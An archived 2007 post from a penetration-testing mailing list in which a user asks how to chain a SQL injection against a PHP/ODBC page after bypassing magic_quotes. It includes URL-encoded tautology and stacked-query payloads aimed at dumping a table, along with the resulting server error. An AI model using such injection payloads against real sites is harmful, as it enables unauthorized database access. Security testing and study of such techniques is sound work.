Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: SQL Injection- Bypassing magic_quotes

From: Danux <danuxx () gmail com>
Date: Tue, 9 Oct 2007 19:24:45 -0500
Hi, well, after taking some examples from you (thanks in advance), i
am able to bypass single quotes son i can inject something simple as:

http://www.site.com/mod.php?id=1%27%20or%201=1--

But now, when trying to print a full table.... with the following injection...:


http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;--

there is a Warning saying that the Connecction is busy:


Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
SQL Server Driver]Connection is busy with results for another hstmt,
SQL state S1000 in SQLExecDirect in .........mod.php

So, i think i need a way to execute the second query (mine) before the
one that mod.php executes by itself (mod.php?id=1)

What you think?

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: